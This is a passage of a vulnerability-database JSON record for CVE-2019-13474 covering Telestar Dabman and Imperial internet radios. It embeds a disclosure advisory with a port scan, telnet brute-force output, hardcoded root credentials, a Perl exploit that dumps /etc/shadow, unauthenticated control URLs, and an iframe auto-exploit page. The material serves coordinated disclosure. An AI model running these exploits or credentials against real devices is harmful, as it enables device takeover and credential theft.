        "model": "imperial i150",
        "scope": null,
        "trust": 0.8,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "imperial i200",
        "scope": null,
        "trust": 0.8,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "imperial i200-cd",
        "scope": null,
        "trust": 0.8,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "imperial i400",
        "scope": null,
        "trust": 0.8,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "imperial i450",
        "scope": null,
        "trust": 0.8,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "imperial i500-bt",
        "scope": null,
        "trust": 0.8,
        "vendor": "telestar",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009470"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13474"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:telestar:bobs_rock_radio_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:telestar:dabman_d10_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:telestar:dabman_i30_stereo_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:telestar:imperial_i110_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:telestar:imperial_i150_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:telestar:imperial_i200_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:telestar:imperial_i200-cd_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:telestar:imperial_i400_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:telestar:imperial_i450_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:telestar:imperial_i500-bt_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009470"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Benjamin K.M. [VULNERABILITY LAB - CORE RESEARCH TEAM]",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-539"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-13474",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2019-13474",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-145324",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2019-13474",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-13474",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2019-13474",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "CVE-2019-13474",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201909-539",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-145324",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-13474",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-145324"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-13474"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009470"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-539"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13474"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands. plural TELESTAR The product contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could exploit this vulnerability to execute arbitrary commands on the system. Document Title:\n===============\nDabman \u0026 Imperial (i\u0026d) Web Radio Devices - Undocumented Telnet Backdoor\n\u0026 Command Execution Vulnerability\n\n\nReferences (Source):\n====================\nhttps://www.vulnerability-lab.com/get_content.php?id=2183\n\nVideo: https://www.vulnerability-lab.com/get_content.php?id=2190\n\nVulnerability Magazine:\nhttps://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution\n\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13473\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13474\n\nCVE-ID:\n=======\nCVE-2019-13473\n\n\nRelease Date:\n=============\n2019-09-09\n\n\nVulnerability Laboratory ID (VL-ID):\n====================================\n2183\n\n\nCommon Vulnerability Scoring System:\n====================================\n9.4\n\n\nVulnerability Class:\n====================\nMultiple\n\n\nCurrent Estimated Price:\n========================\n5.000\u20ac - 10.000\u20ac\n\n\nProduct \u0026 Service Introduction:\n===============================\nSince 1993, TELESTAR has been synonymous with quality and a very good\nprice/performance ratio in the consumer electronics segment. \nTELESTAR-DIGITAL GmbH distributes high-quality reception technology for\ndigital TV reception via satellite (DVB-S), cable (DVBC)\nor terrestrial (DVB-T) from its headquarters in the Vulkaneifel region\nof Germany. The product portfolio includes digital receivers\nand the latest generation of television sets as well as modern\ndistribution and single-cable technology, satellite to IP reception\nsolutions and radio transmission systems. The product range is rounded\noff by Germany\u0027s most comprehensive range of accessories\nfor digital television reception. \n\n(Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh )\n\n\nAbstract Advisory Information:\n==============================\nThe vulnerability laboratory research team discovered multiple\nvulnerabilities in the dabman and imperial web radio devices series (typ\nd \u0026 i). \n\n\nVulnerability Disclosure Timeline:\n==================================\n2018-06-01: Researcher Notification \u0026 Coordination (Security Researcher)\n2018-06-02: Vendor Notification (Telestar Digital Data Security Department)\n2018-06-07: Vendor Response/Feedback (Telestar Digital Data Security\nDepartment)\n2018-08-30: Vendor Fix/Patch (Service Developer Team)\n2019-09-08: Public Disclosure (Vulnerability Laboratory)\n\n\nDiscovery Status:\n=================\nPublished\n\n\nExploitation Technique:\n=======================\nRemote\n\n\nSeverity Level:\n===============\nCritical\n\n\nAuthentication Type:\n====================\nPre auth - no privileges\n\n\nUser Interaction:\n=================\nNo User Interaction\n\n\nDisclosure Type:\n================\nCoordinated Disclosure\n\n\nTechnical Details \u0026 Description:\n================================\n1.1\nThe dabman and imperial manufactured web radio series (typ d \u0026 i)\nsuffers from a weak password vulnerability. \nThe vulnerabilites allows local and remote attackers to compromise the\nweb radios full embedded linux busybox os. \n\nThe vulnerability is located within an undocumented telnet service\n(telnetd) of the linux busybox and is\nturned permanently on. The telnetd service uses weak passwords with\nhardcoded credentials on the local embedded\nlinux busybox of the internet radio devices. The telnet password can be\ncracked by usage of simple manual password\nbruteforce technics or by basic automated attacks with scripts (exp. \nncrack). After receiving the password the\nremote or local network attacker can unauthorized login to the internet\nradio device to use the embedded linux\nbusybox operating system. \n\nAfter the attacker has been logged in as root user, he can open the\n/etc/ path to cat gshadow, shadow and the conf files. \nAt the end the attacker has finally full root access on the busybox\n(telnetd), he can access the web-server (httpd) as\nadmin and see the wireless lan + unencrypted key in ./flash/ - wifi.cfg. \nA demo exploit poc is available in the wild. \nThe vulnerability allows local and remote attackers unauthorized and\nunauthenticated send commands to comprimise the web radio devices. \n\nThe vulnerability is located httpd web-server communcation on port 80\nand 8080. Local and remote attackers can send basic GET\ncommands with basic command line tools (exp. curl or modhttp) to modify\nor manipulate http requests. The attacker can also capture\nthe http airmusic commands to reverse engineer the radio device for\nunauthorized interactions. The system has no protection mechanism\nto block unauthorized transmit of commands. The web radio as well not\nowns an auth or reminder mechanism to ensure only allowed or\ntrusted sources can transmit the commands (client, system, mac , auth ...). \nFor security demonstration or to reproduce follow the provided\ninformation and steps below to continue. \n\n\nNmap Portscan\nScanning R-MAVERIC-EMAC_1_01_018 (93.234.141.215) [1000 ports]\nDiscovered open port 8080/tcp on 93.234.141.215\nDiscovered open port 80/tcp on 93.234.141.215\nDiscovered open port 23/tcp on 93.234.141.215\nCompleted SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports)\nInitiating Service scan at 14:48\nScanning 3 services on R-MAVERIC-EMAC_1_01_018 (93.234.141.215)\nCompleted Service scan at 14:48, 6.20s elapsed (3 services on 1 host)\nInitiating OS detection (try #1) against R-MAVERIC-EMAC_1_01_018\n(93.234.141.215)\nNSE: Script scanning 93.234.141.215. \nInitiating NSE at 14:48\nCompleted NSE at 14:49, 30.61s elapsed\nInitiating NSE at 14:49\nCompleted NSE at 14:49, 0.00s elapsed\nNmap scan report for R-MAVERIC-EMAC_1_01_018 (93.234.141.215)\nHost is up (0.010s latency). \nNot shown: 997 closed ports\nPORT     STATE SERVICE    VERSION\n23/tcp   open  telnet     security DVR telnetd (many brands)\n80/tcp   open  tcpwrapped\n|_http-title: AirMusic\n8080/tcp open  http       BusyBox httpd 1.13\n| http-methods:\n|_  Supported Methods: GET\n|_http-title: 404 Not Found\nMAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology)\nDevice type: general purpose\nRunning: Linux 2.6.X\nOS CPE: cpe:/o:linux:linux_kernel:2.6\nOS details: Linux 2.6.16 - 2.6.35 (embedded)\nUptime guess: 5.967 days (since Sun Jun 23 15:36:08 2019)\nNetwork Distance: 1 hop\nTCP Sequence Prediction: Difficulty=197 (Good luck!)\nIP ID Sequence Generation: All zeros\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\n\nNCrack [telnetd] (ncrack -v --user root [IP]:[PORT])\nC:Program Files (x86)Ncrack\u003encrack -v --user root 93.234.141.215:23\nStarting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21\nMitteleurop\u00f5ische Sommerzeit\nDiscovered credentials on telnet://93.234.141.215:23 \u0027root\u0027 \u0027password\u0027\nDiscovered credentials on telnet://93.234.141.215:23 \u0027root\u0027 \u0027password1\u0027\nDiscovered credentials on telnet://93.234.141.215:23 \u0027root\u0027 \u0027password2\u0027\nDiscovered credentials on telnet://93.234.141.215:23 \u0027root\u0027 \u0027password123\u0027\nDiscovered credentials on telnet://93.234.141.215:23 \u0027root\u0027 \u0027password12\u0027\nDiscovered credentials on telnet://93.234.141.215:23 \u0027root\u0027 \u0027password3\u0027\nDiscovered credentials on telnet://93.234.141.215:23 \u0027root\u0027 \u0027password!\u0027\ntelnet://93.234.141.215:23 finished. Too many failed attemps. \nDiscovered credentials for telnet on 93.234.141.215 23/tcp:\n93.234.141.215 23/tcp telnet: \u0027root\u0027 \u0027password\u0027\n93.234.141.215 23/tcp telnet: \u0027root\u0027 \u0027password1\u0027\n93.234.141.215 23/tcp telnet: \u0027root\u0027 \u0027password2\u0027\n93.234.141.215 23/tcp telnet: \u0027root\u0027 \u0027password123\u0027\n93.234.141.215 23/tcp telnet: \u0027root\u0027 \u0027password12\u0027\n93.234.141.215 23/tcp telnet: \u0027root\u0027 \u0027password3\u0027\n93.234.141.215 23/tcp telnet: \u0027root\u0027 \u0027password!\u0027\nNcrack done: 1 service scanned in 273.29 seconds. \nProbes sent: 1117 | timed-out: 50 | prematurely-closed: 117\nNcrack finished. \n\n\nSystem:\nBusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash)\n\nKernel:\n9)20151217_M8_TFT_7601_Kernel\n\nOS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC:\n(GNU) 4.2.1GCC: (GNU) 4.2.1GCC:\n(GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian\nprerelease)Aaeabi.shstrtab.init.text.fini. \nrodata.ARM.extab.ARM.exidx.eh_frame.init_array. \nfini_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes\n\n\nBuilt-in commands:\n . : [ [[ bg break cd chdir continue echo eval exec exit export\nfalse fg hash help jobs kill local printf pwd read readonly return\nset shift source test times trap true type ulimit umask unset wait\n\nCurrently defined functions:\n        [, [[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput,\n        gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc,\nlogin,\n        ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod,\nroute,\n        run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc,\n        udhcpd, umount, unlzma, usleep, zcat\n\n\nUsername: root\nPassword: password \u0026 password!\n\nshadow\nroot:r.BF8RVw56BOA:1:0:99999:7:::\t(decrypted: password \u0026 mldonkey)\nftp:!:0::::::\t\t\t\t(decrypted: empty/blank)\nusb:w.rW11jv2dmM2:13941::::::\t\t(decrypted: winbond)\n\ngshadow\nroot:::root,mldonkey\n\n\nPoC: Exploit\nuse Net::Telnet ();\nuse Cwd;\n$file=\"inputLog.txt\";\n$ofile=\"outputlog.txt\";\n\n# For local network change to localhost or local ip\n@hosts = (\"93.234.141.215\");\n\nforeach $hostip (sort @hosts)\n{\n    $t = new Net::Telnet (Timeout =\u003e 10,\n                    Input_log =\u003e $file,\n                    Prompt =\u003e \"/\u003e/\");\n    print \"nnConnecting to undocumented Telnet Service of Imperial or\nDabman Web Radio Service: $hostip ...n\";\n\tprint \"nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150,\ni200, i200-cd, i400, i450, i500-bt, i600n\";\n    $t-\u003eopen(\"$hostip\");\n    $t-\u003elogin(\"root\",\"password\");\n    my @lines = $t-\u003ecmd(\u0027cat /etc/shadow\u0027);\n    print \"$hostip: Directories:n\";\n    print \"@lines n\";\n    $t-\u003eclose;\n}\n\n\n\n1.2  AirMusic Unauthenticated Command Execution (httpd)\nThe security vulnerability can be exploited by local and remote\nattackers without user interaction or privileged user account. \nFor security demonstration or to reproduce follow the provided\ninformation and steps below to continue. \n\nAirMusic Status Interface: http://93.234.141.215:80\nWeb-Server HTTPD UIData Path: http://93.234.141.215:8080\n\nNote: Attacks can be performed in the local network (Localhost:80) or\nremotly by requesting the url remote ip adress (93.234.141.215) +\nforwarded remote port(Standard :23). \n\nGet device name from Device\nhttp://93.234.141.215:80/irdevice.xml\n\nSet device name\nhttp://93.234.141.215:80/set_dname?name=PWND\n\nSet boot-logo (HTTP URL, requirement: JPG)\nhttp://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg\n\nDisplay or retrieve channel logo\nhttp://93.234.141.215:80:8080/playlogo.jpg\n\nChanging the main menu with the selected language\nhttp://93.234.141.215:80/init?language=us\n\nPlay stream\nhttp://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav\u0026name=NAME\n\nSave audio file as message\nhttp://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav\u0026save=1\n\nRecall channel hotkeys\nhttp://93.234.141.215:80/hotkeylist\n\nCurrent playback data\nhttp://93.234.141.215:80/playinfo\n\nSet volume from 0-31 \u0026 mute function\nhttp://93.234.141.215:80/setvol?vol=10\u0026mute=0\n\nReset\nhttp://93.234.141.215:80/back\n\nSet stop\nhttp://93.234.141.215:80/stop\n\nActivate all back\nhttp://93.234.141.215:80/exit\n\nSend keystroke combo\nhttp://93.234.141.215:80/Sendkey?key=3\n\n\nPoC: Exploit\n\u003chtml\u003e\n\u003chead\u003e\u003cbody\u003e\n\u003ctitle\u003eDabman \u0026 Imerpial - HTML AutoPwner\u003c/title\u003e\n\u003ciframe src=http://93.234.141.215:80/set_dname?name=PWND\u003e\u003c/iframe\u003e\n\u003ciframe\nsrc=http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg\u003e\u003c/iframe\u003e\n\u003ciframe\nsrc=http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav\u0026name=NAME\u003e\u003c/iframe\u003e\n\u003ciframe\nsrc=http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav\u0026save=1\u003e\u003c/iframe\u003e\n\u003c/body\u003e\u003c/head\u003e\n\u003chtml\u003e\n\n\nPoC: Checker for Modifications\n#!/usr/bin/perl\n\nuse strict;\nuse warnings;\nuse LWP::Simple;\n\nmy $url1 = \u0027http://93.234.141.215:80/\u0027;\nmy $source1 = get( $url1 );\n\nmy $url2 = \u0027http://93.234.141.215:80/\u0027;\nmy $source2 = get( $url2 );\n\nprint $source1;\nprint $source1;\n\n\nSolution - Fix \u0026 Patch:\n=======================\nA fresh updated version is available by the manufacturer telestar to\nresolve the vulnerabilities in all i \u0026 d series products. \nIt is recommended to install the updates as quick as possible to ensure\nthe digital security. \n\n1. Set the device to the factory setting\n2. Select language\n3. Switch off the device\n4. Switch on the device\n5. Network setup\n6. Wait for \"New Software\" message\n7. Press OK to start the update\n8. Updated Version: TN81HH96-g102h-g103**a*-fb21a-3624\n\n\nSecurity Risk:\n==============\nThe security risk of the vulnerabilities in the online web radio with\nwifi and user interface are estimated as critical. \nThe vulnerability can be exploited by local attackers in a network or by\nremote attackers without user interaction or\nfurther privileged user accounts. The potential of the issue being\nexploited in thousends of end user devices all over europe\nis estimated as high. The issue has the potential that could be used by\nremote attackers for spreading randomware / malware,\nmass defacements, compromises for further linux network attacks or being\npart of a criminal acting iot botnet. \n\n\nCredits \u0026 Authors:\n==================\nBenjamin K.M. [VULNERABILITY LAB - CORE RESEARCH TEAM] -\nhttps://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. \n\n\nDisclaimer \u0026 Information:\n=========================\nThe information provided in this advisory is provided as it is without\nany warranty. Vulnerability Lab disclaims all warranties,\neither expressed or implied, including the warranties of merchantability\nand capability for a particular purpose. Vulnerability-Lab\nor its suppliers are not liable in any case of damage, including direct,\nindirect, incidental, consequential loss of business profits\nor special damages, even if Vulnerability-Lab or its suppliers have been\nadvised of the possibility of such damages. Some states do\nnot allow the exclusion or limitation of liability for consequential or\nincidental damages so the foregoing limitation may not apply. \nWe do not approve or encourage anybody to break any licenses, policies,\ndeface websites, hack into databases or trade with stolen data. \n\nDomains:    www.vulnerability-lab.com\t\twww.vuln-lab.com\t\t\t\nwww.vulnerability-db.com\nServices:   magazine.vulnerability-lab.com\npaste.vulnerability-db.com \t\t\tinfosec.vulnerability-db.com\nSocial:\t    twitter.com/vuln_lab\t\tfacebook.com/VulnerabilityLab \t\t\nyoutube.com/user/vulnerability0lab\nFeeds:\t    vulnerability-lab.com/rss/rss.php\nvulnerability-lab.com/rss/rss_upcoming.php\nvulnerability-lab.com/rss/rss_news.php\nPrograms:   vulnerability-lab.com/submit.php\nvulnerability-lab.com/register.php\nvulnerability-lab.com/list-of-bug-bounty-programs.php\n\nAny modified copy or reproduction, including partially usages, of this\nfile requires authorization from Vulnerability Laboratory. \nPermission to electronically redistribute this alert in its unmodified\nform is granted. All other rights, including the use of other\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. \nAll pictures, texts, advisories, source code, videos and other\ninformation on this website is trademark of vulnerability-lab team \u0026 the\nspecific authors or managers. To record, list, modify, use or\nedit our material contact (admin@ or research@) to get a ask permission. \n\n\t\t\t\t    Copyright \u00a9 2019 | Vulnerability Laboratory - [Evolution\nSecurity GmbH]\u2122\n-- \nVULNERABILITY LABORATORY - RESEARCH TEAM\nSERVICE: www.vulnerability-lab.com\n\n. The internet radio device auna IR-160 SE has multiple vulnerabilities. \nIt uses the firmware UIProto, different versions of which can also be \nfound in many other radios. The firmware offers a rudimentary web API that can be reached on the \nlocal network on port 80. This API is completely unauthenticated, \nallowing anyone to control the radio over the local network. (already \nknown as CVE-2019-13474, but relevant for the other two findings) [1] \n[2] [3]\n\n2. The web UI does not encode user input, resulting in a XSS \nvulnerability, e.g. The firmware crashes when sending a device name longer than 84 \ncharacters. Some parts of the firmware will recover afterwards and music \nwill play again after a few seconds, but the service on port 80 remains \nborked until the radio is reset using the switch on the back. This may \nor may not be a memory corruption vulnerability. I don\u0027t feel like \nanalyzing this any further, but it certainly looks kinda fucked. These reports also mention \nother devices that are possibly affected by this as well. \n\nAlso, if anyone knows how to re-enable telnetd on the patched version of \nUIProto, please let me know!\n\nLove,\nnaphthalin\n\n[1] https://github.com/kayrus/iradio\n[2] https://sites.google.com/site/tweakradje/devices/abeo-internet-radio\n[3] \nhttps://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-13474"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009470"
      },
      {
        "db": "VULHUB",
        "id": "VHN-145324"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-13474"
      },
      {
        "db": "PACKETSTORM",
        "id": "154416"
      },
      {
        "db": "PACKETSTORM",
        "id": "174503"
      }
    ],
    "trust": 1.98
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-13474",
        "trust": 2.8
      },
      {
        "db": "PACKETSTORM",
        "id": "174503",
        "trust": 1.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009470",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-539",
        "trust": 0.7
      },
      {
        "db": "VULHUB",
        "id": "VHN-145324",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-13474",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154416",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-145324"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-13474"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009470"
      },
      {
        "db": "PACKETSTORM",
        "id": "154416"
      },
      {
        "db": "PACKETSTORM",
        "id": "174503"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-539"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13474"
      }
    ]
  },
  "id": "VAR-201909-1008",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-145324"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-11-23T22:11:49.853000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://telestar.de/"
      },
      {
        "title": "Dabman \u0026 Imperial Web Radio Devices Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=98127"
      },
      {
        "title": "CVE",
        "trust": 0.1,
        "url": "https://github.com/grymer/CVE "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-13474"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009470"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-539"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-798",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-287",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-145324"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009470"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13474"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.7,
        "url": "https://www.vulnerability-lab.com/get_content.php?id=2183"
      },
      {
        "trust": 1.9,
        "url": "http://seclists.org/fulldisclosure/2019/sep/12"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13474"
      },
      {
        "trust": 1.1,
        "url": "http://seclists.org/fulldisclosure/2023/sep/1"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/174503/internet-radio-auna-ir-160-se-uiproto-dos-xss-missing-authentication.html"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-13474"
      },
      {
        "trust": 0.6,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/166725"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13473"
      },
      {
        "trust": 0.2,
        "url": "https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/798.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg"
      },
      {
        "trust": 0.1,
        "url": "https://www.vulnerability-lab.com/show.php?user=benjamin+k.m."
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/back"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/irdevice.xml"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/set_dname?name=pwnd"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/exit"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80"
      },
      {
        "trust": 0.1,
        "url": "http://93.234.141.215:80/playinfo"
      },
      {
